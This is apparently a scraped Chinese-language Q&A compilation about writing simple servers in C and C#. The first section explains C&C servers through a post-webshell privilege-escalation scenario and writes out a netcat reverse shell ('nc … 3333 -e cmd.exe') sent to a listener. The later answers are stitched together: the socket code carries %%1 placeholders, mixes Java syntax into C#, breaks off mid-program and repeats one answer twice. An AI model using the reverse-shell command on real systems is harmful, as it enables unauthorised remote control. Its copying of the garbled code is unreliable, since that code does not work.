1、什麼是C&C伺服器
C&C
伺服器的全稱是
Command
and
Control
Server,翻譯過來就是命令和控制伺服器
通常在做滲透測試的時候,在拿到一個
webshell
的時候,需要對伺服器進行提權操作,如果是一台
windows
的伺服器,提權的時候通常是利用本地提權漏洞的
exp
進行溢出提權,有些
exp
可以直接在後面加參數,溢出成功之後執行參數中的命令。
而有的
exp
溢出成功之後是返回一個
system
許可權的
cmd,這時就需要將低許可權的
cmd
shell
反彈回本地,這里用
nc
在本地執行:nc
-vv
-lp
3333
上述命令的意思是在本地監聽一個
3333
埠等待連接,假設電腦
IP
是公網的,並且
IP
為
114.114.114.114,然後在目標伺服器就可以執行:nc
114.114.114.114
3333
-e
cmd.exe
上面的命令就可以把遠程伺服器的伺服器許可權的
cmd
shell
返回到本地,這時你就可以通過
nc
建立的這個
shell
進行通信,發送你要執行的命令,在遠程伺服器接收到命令之後執行並將結果返回,這時本機電腦就是一個簡易的
C&C
伺服器。
(1)c簡單伺服器擴展資料:
C&C
伺服器使目標機器可以接收來自伺服器的命令,從而達到伺服器控制目標機器的目的。該方法常用於病毒木馬控制被感染的機器。
通常只有這樣內網的伺服器才可以訪問進行連接,所以可以使用一台中轉伺服器,這台中轉伺服器有一個公網
IP
地址是:111.111.111.111,這樣不管是目標伺服器還是我們本機都可以訪問這台中轉伺服器。
這里中轉伺服器的作用就是本地內網的主機監聽的埠映射到公網
IP
的某個埠,這樣目標機訪問中轉伺服器監聽的埠就相當於訪問了我們本地監聽的埠。
2、如何用c語言實現http伺服器
//服務端簡易代碼如下:編譯:編譯時把libevent的類庫中的.so文件和.h文件連接 進來。
3、求一個最簡單的c# C/S Socket 伺服器端實例 非同步
1.簡單伺服器端
/*
using System.Data;
using System.Net.Sockets;
using System.Net;
using System.Threading;
private static int port = %%2;
private static Thread thThreadRead;
private static TcpListener TcpListen;
private static bool bListener = true;
private static Socket stRead;
*/
private static void Listen()
{
try
{
TcpListen = new TcpListener(port);
TcpListen.Start();
stRead = TcpListen.AcceptSocket();
EndPoint tempRemoteEP = stRead.RemoteEndPoint;
IPEndPoint tempRemoteIP = (IPEndPoint)tempRemoteEP;
IPHostEntry host = Dns.GetHostByAddress(tempRemoteIP.Address);
string sHostName = host.HostName;
while (bListener)
{
stRead.Send(Encoding.ASCII.GetBytes(%%1));
string sTime = DateTime.Now.ToShortTimeString();
Byte[] byRead = new Byte[1024];
int iRead = stRead.ReceiveFrom(byRead, ref tempRemoteEP);
Byte[] byText = new Byte[iRead];
Array.Copy(byRead, 0, byText, 0, iRead);
string line = System.Text.Encoding.Default.GetString(byRead);
}
}
catch (System.Security.SecurityException)
{
//監聽失敗
}
}
thThreadRead = new Thread(new ThreadStart(Listen));
thThreadRead.Start();
2.簡單客戶端
/*
using System.Data;
using System.Net.Sockets;
using System.Net;
private static IPEndPoint dateTimeHost;
*/
string hostIPString=%%1;
string hostPortString=%%2;
IPAddress hostIP=IPAddress.Parse(hostIPString);
dateTimeHost=new IPEndPoint(hostIP,Int32.Parse(hostPortString));
Socket conn=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
conn.Connect(dateTimeHost);
int bytes=0;
Byte[] RecvBytes=new Byte[256];
bytes=conn.Receive(RecvBytes,RecvBytes.Length,0);
string RecvString=Encoding.ASCII.GetString(RecvBytes,0,bytes);
Console.WriteLine(RecvString);
conn.Shutdown(SocketShutdown.Both);
conn.Close();
3.獲得本機IP
//using System.Net;
IPAddress[] addressList = Dns.GetHostByName(Dns.GetHostName()).AddressList;
string %%1=null;
for (int i = 0; i < addressList.Length; i++)
{
%%1 += addressList[i].ToString();
}
5.點對點通信
/*
using System.Data;
using System.Net.Sockets;
using System.Net;
using System.Threading;
*/
Thread th;
TcpListener tpListen1;
bool listenerRun=true;
NetworkStream tcpStream;
StreamWriter reqStreamW;
TcpClient tcpc;
Socket skSocket;
protected void Listen()
{
try{
tpListen1=new TcpListener(Int32.Parse(%%2));
tpListen1.Start();
skSocket=tpListen1.AcceptSocket();
EndPoint tempRemoteEP=skSocket.RemoteEndPoint;
IPEndPoint tempRemoteIP=(IPEndPoint)tempRemoteEP;
IPHostEntry host=Dns.GetHostByAddress(tempRemoteIP.Address);
string HostName=host.HostName;
while(listenerRun)
{
Byte[] stream=new Byte[1024];
string time=DateTime.Now.ToString();
int i=skSocket.ReceiveFrom(stream,ref tempRemoteEP);
string %%5=Encoding.UTF8.GetString(stream);
//指定編碼,從緩沖區中解析出內容
//time+" "+HostName+":"
}
}
catch(Security.SecurityException)
{
//防火牆安全錯誤!
}
try{
string sMsg=%%4;
string MyName=Dns.GetHostName();
reqStreamW=new StreamWriter(tcpStream);
reqStreamW.Write(sMsg);
reqStreamW.Flush();
string time=DateTime.Now.ToString();
//顯示傳送的數據和時間
//time+" "+MyName+":"
//sMsg
}
catch(Exception)
{
//無法發送信息到目標計算機!
}
protected override void Dispose(bool disposing)
{
try{
listenerRun=false;
th.Abort();
th=null;
tpListen1.Stop();
skSocket.Close();
tcpc.Close();
}
catch{}
if(disposing && component!=null)
{
components.Dispose();
}
}
base.Dispose(disposing);
}
16.聊天室伺服器端邏輯
using System.Data;
using System.Net.Sockets;
using System.Net;
using System.Threading;
using System.Collections;
class Server
{
private static List<Socket> li = new ArrayList<Socket>();
private static TcpListener TcpListen;
private static Socket stRead;
public Server(int port)
{
try
{
TcpListen = new TcpListener(port);
TcpListen.Start();
}
catch (Exception) { }
}
public List<TcpListener> Li()
{
get{
return li;
};
set{
li=value;
};
}
public void start()
{
while (true)
{
Socket s;
try
{
stRead = TcpListen.AcceptSocket();
li.Add(TcpListen);
new Service(this, s).start();
}
catch (Exception e) { }
}
}
static void main(string[] args)
{
new Server(8888).start();
}
}
class Service
{
private static Socket stRead;
private static bool bListener = true;
private static TcpListener TcpListen;
public Service(Server server, Socket client)
{
TcpClient tcpc;
Socket stSend = null;
bool tcpConnect = false;
try
{
stSend = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
EndPoint tempRemoteEP = stSend.RemoteEndPoint;
IPEndPoint tempRemoteIP = (IPEndPoint)tempRemoteEP;
EndPoint epTemp = (EndPoint)tempRemoteIP;
stSend.Connect(epTemp);
tcpConnect = true;
}
catch (Exception)
{
//MessageBox.Show("目標計算機拒絕了連接請求!");
}
finally
{
if (tcpConnect)
{
stSend.Close();
}
}
}
public static void run()
{
while (true)
{
stRead = TcpListen.AcceptSocket();
EndPoint tempRemoteEP = stRead.RemoteEndPoint;
IPEndPoint tempRemoteIP = (IPEndPoint)tempRemoteEP;
IPHostEntry host = Dns.GetHostByAddress(tempRemoteIP.Address);
string sHostName = host.HostName;
while (bListener)
{
string sTime = DateTime.Now.ToShortTimeString();
Byte[] byRead = new Byte[1024];
int iRead = stRead.ReceiveFrom(byRead, ref tempRemoteEP);
Byte[] byText = new Byte[iRead];
Array.Copy(byRead, 0, byText, 0, iRead);
string line = System.Text.Encoding.Default.GetString(byRead);
}
}
}
static void Main(string[] args)
{
}
}
17.聊天室客戶端邏輯
/*
類似qq聊天工具
你看看。。
這是客服端的代碼:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Threading;
using System.Net;
using System.Net.Sockets;
namespace demo2
{
public partial class frmTouchWe : Form
{
Thread a;
//發送IP跟埠
private UdpClient udp = new UdpClient("127.0.0.1",9000);
//接收埠
private UdpClient udpSend = new UdpClient(8000);
private IPEndPoint ip = new IPEndPoint(IPAddress.Any,0);
public frmTouchWe()
{
InitializeComponent();
Form. = false;
}
private void frmTouchWe_Load(object sender, EventArgs e)
{ //定義線程開始
a = new Thread(new ThreadStart(Run));
a.Start(); }
private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
//客服接收信息。彈出窗體
frmAnswerInfo answerInfo = new frmAnswerInfo();
answerInfo.Show(); }
private void button1_Click(object sender, EventArgs e)
{
//在自己的信息欄中顯示自己的信息
lsbInfo.Items.Add(txtInfo.Text);
//用戶信息內容
string Mes = txtInfo.Text;
//用戶信息
string mes = "用戶:"+Program.user.id+"("+Program.user.name+")"+" " + time;
//轉換成位元組
byte[] b = UTF8Encoding.UTF8.GetBytes(Mes);
byte[] bb = UTF32Encoding.UTF8.GetBytes(mes);
//發送信息
udp.Send(bb, bb.Length);
udp.Send(b, b.Length);
txtInfo.Text = "";
}
//循環接受客服發來的信息
private void Run()
{
while (true)
{
byte[] b = udpSend.Receive(ref ip);
string mes = UTF8Encoding.UTF8.GetString(b);
lsbInfo.Items.Add(mes);
}
}
private void button2_Click(object sender, EventArgs e)
{
this.Close();
}
private void button3_Click_1(object sender, EventArgs e)
{
//清空所有項
lsbInfo.Items.Clear();
}
}
}
下面是伺服器端的代碼
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Threading;
using System.Net;
using System.Net.Sockets;
namespace demo2
{
public partial class frmAnswerInfo : Form
{
//定義一條線程,用來循環接收客戶發來的信息
Thread a;
//定義另一條線程,用來升起窗體
Thread b;
//發送到信息的地址
private UdpClient udpSend = new UdpClient("127.0.0.1",8000);
//接收埠
private UdpClient udp = new UdpClient(9000);
private IPEndPoint ip = new IPEndPoint(IPAddress.Any,0);
public frmAnswerInfo()
{
InitializeComponent();
Form. = false;
}
//循環接收信息
private void Run()
{
while (true)
{
byte[] b = udp.Receive(ref ip);
string mes = UTF8Encoding.UTF8.GetString(b);
lsbInfo.Items.Add(mes);
}
}
private void frmAnswerInfo_Load(object sender, EventArgs e)
{
//設置窗體的位置屬性(窗體載入時候慢慢從右下角升上來~類似qq廣告~~)
this.Top = Screen.PrimaryScreen.WorkingArea.Height;
this.Left = Screen.PrimaryScreen.WorkingArea.Width - this.Width;
//設置窗體的名字
a = new Thread(new ThreadStart(Run));
b = new Thread(new ThreadStart(run));
//開始線程
a.Start();
b.Start();
}
//用戶點擊談話時顯示該窗體
private void run()
{
while (true)
{
this.Top = this.Top - 10;
Thread.Sleep(100);
if (Screen.PrimaryScreen.WorkingArea.Height - this.Height >= this.Top)
{
break;
}
}
}
//發送按鈕編碼
private void button1_Click(object sender, EventArgs e)
{
//獲取當前時間
DateTime time = DateTime.Now;
//在自己的信息欄中顯示自己發出去的信息
lsbInfo.Items.Add("在線客服:"+time);
lsbInfo.Items.Add(txtInfo.Text);
//在客戶端顯示自己的信息標題
string mes = "在線客服:"+time;
//信息內容
string Mes = txtInfo.Text;
//發送信息標題
byte[] b = UTF8Encoding.UTF8.GetBytes(mes);
//發送信息內容
byte[] bb = UTF8Encoding.UTF8.GetBytes(Mes);
udpSend.Send(b, b.Length);
udpSend.Send(bb,bb.Length);
txtInfo.Text = "";
}
private void button2_Click(object sender, EventArgs e)
{
this.Close();
}
private void button3_Click(object sender, EventArgs e)
{
//清除所有項
lsbInfo.Items.Clear();
}
}
}
*/
4、c語言有網路編程有沒有人使用c做游戲伺服器
目前通用的編程語言有兩種形式:匯編語言和高級語言。
匯編語言的實質和機器語言是相同的,都是直接對硬體操作,只不過指令採用了英文縮寫的標識符,更容易識別和記憶。它同樣需要編程者將每一步具體的操作用命令的形式寫出來。匯編程序通常由三部分組成:指令、偽指令和宏指令。匯編程序的每一句指令只能對應實際操作過程中的一個很細微的動作,例如移動、自增,因此匯編源程序一般比較冗長、復雜、容易出錯,而且使用匯編語言編程需要有更多的計算機專業知識,但匯編語言的優點也是顯而易見的,用匯編語言所能完成的操作不是一般高級語言所能實現的,而且源程序經匯編生成的可執行文件不僅比較小,而且執行速度很快。
高級語言是目前絕大多數編程者的選擇。和匯編語言相比,它不但將許多相關的機器指令合成為單條指令,並且去掉了與具體操作有關但與完成工作無關的細節,例如使用堆棧、寄存器等,這樣就大大簡化了程序中的指令。同時,由於省略了很多細節,編程者也就不需要有太多的專業知識。
高級語言主要是相對於匯編語言而言,它並不是特指某一種具體的語言,而是包括了很多編程語言,如目前流行的VB、VC、FoxPro、Delphi等,這些語言的語法、命令格式都各不相同。
高級語言所編制的程序不能直接被計算機識別,必須經過轉換才能被執行,按轉換方式可將它們分為兩類:
解釋類:執行方式類似於我們日常生活中的「同聲翻譯」,應用程序源代碼一邊由相應語言的解釋器「翻譯」成目標代碼(機器語言),一邊執行,因此效率比較低,而且不能生成可獨立執行的可執行文件,應用程序不能脫離其解釋器,但這種方式比較靈活,可以動態地調整、修改應用程序。
編譯類:編譯是指在應用源程序執行之前,就將程序源代碼「翻譯」成目標代碼(機器語言),因此其目標程序可以脫離其語言環境獨立執行,使用比較方便、效率較高。但應用程序一旦需要修改,必須先修改源代碼,再重新編譯生成新的目標文件(* .OBJ)才能執行,只有目標文件而沒有源代碼,修改很不方便。現在大多數的編程語言都是編譯型的,例如Visual C++、Visual Foxpro、Delphi等。
5、誰能用C語言寫個最簡單socket通信服務端和客戶端示例
網路的Socket數據傳輸是一種特殊的I/O,Socket也是一種文件描述符。Socket也具有一個類似於打開文件的函數調用Socket(),該函數返回一個整型的Socket描述符,隨後的連接建立、數據傳輸等操作都是通過該Socket實現的。
下面用Socket實現一個windows下的c語言socket通信例子,這里我們客戶端傳遞一個字元串,伺服器端進行接收。
【伺服器端】
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <winsock2.h>
#define SERVER_PORT 5208 //偵聽埠
void main()
6、如何用C語言開發一個通用web伺服器?
用C語言開發WEB,可以用C++BUILDER6,稱ISAPI,一般人可能做不起來,有點麻煩;
唯一是速度很快,別人看不到源碼,掌握了編程套路,也可以開發應用;
缺點:
1。不是解釋性語言,做的WEB調試非常麻煩;現在做WEB開發的,用C#、JAVA較多;都是解釋性的語言;
2。因為是.DLL的二進制代碼,一般商業網站不給予運行的環境,因為網站伺服器會被你可能搞癱,安全性得不到保障;所以,你得自備網頁伺服器;
3。得不到技術支持,因為沒幾個人會這種開發;
7、如何用c語言在windows環境下實現簡單的web伺服器
用C語言開發WEB,可以用C++BUILDER6,稱ISAPI,一般人可能做不起來,有點麻煩;
唯一是速度很快,別人看不到源碼,掌握了編程套路,也可以開發應用;
缺點:
1。不是解釋性語言,做的WEB調試非常麻煩;現在做WEB開發的,用C#、JAVA較多;都是解釋性的語言;
2。因為是.DLL的二進制代碼,一般商業網站不給予運行的環境,因為網站伺服器會被你可能搞癱,安全性得不到保障;所以,你得自備網頁伺服器;
3。得不到技術支持,因為沒幾個人會這種開發;
8、c語言訪問伺服器
lz要先知道什麼是socket,它是TCP/IP協議的API。再上層是http udp之類傳輸報文協議。而什麼是伺服器,如你所說tomcat伺服器,他是一個http(s)伺服器。處理由客戶發送的HTTP報文。並返回報文給客戶。
簡單來說,http就是socket的一個封裝。所以c語言使用socket理所當然能訪問任何伺服器。至於使用什麼格式,你可以看看HTTP報文格式。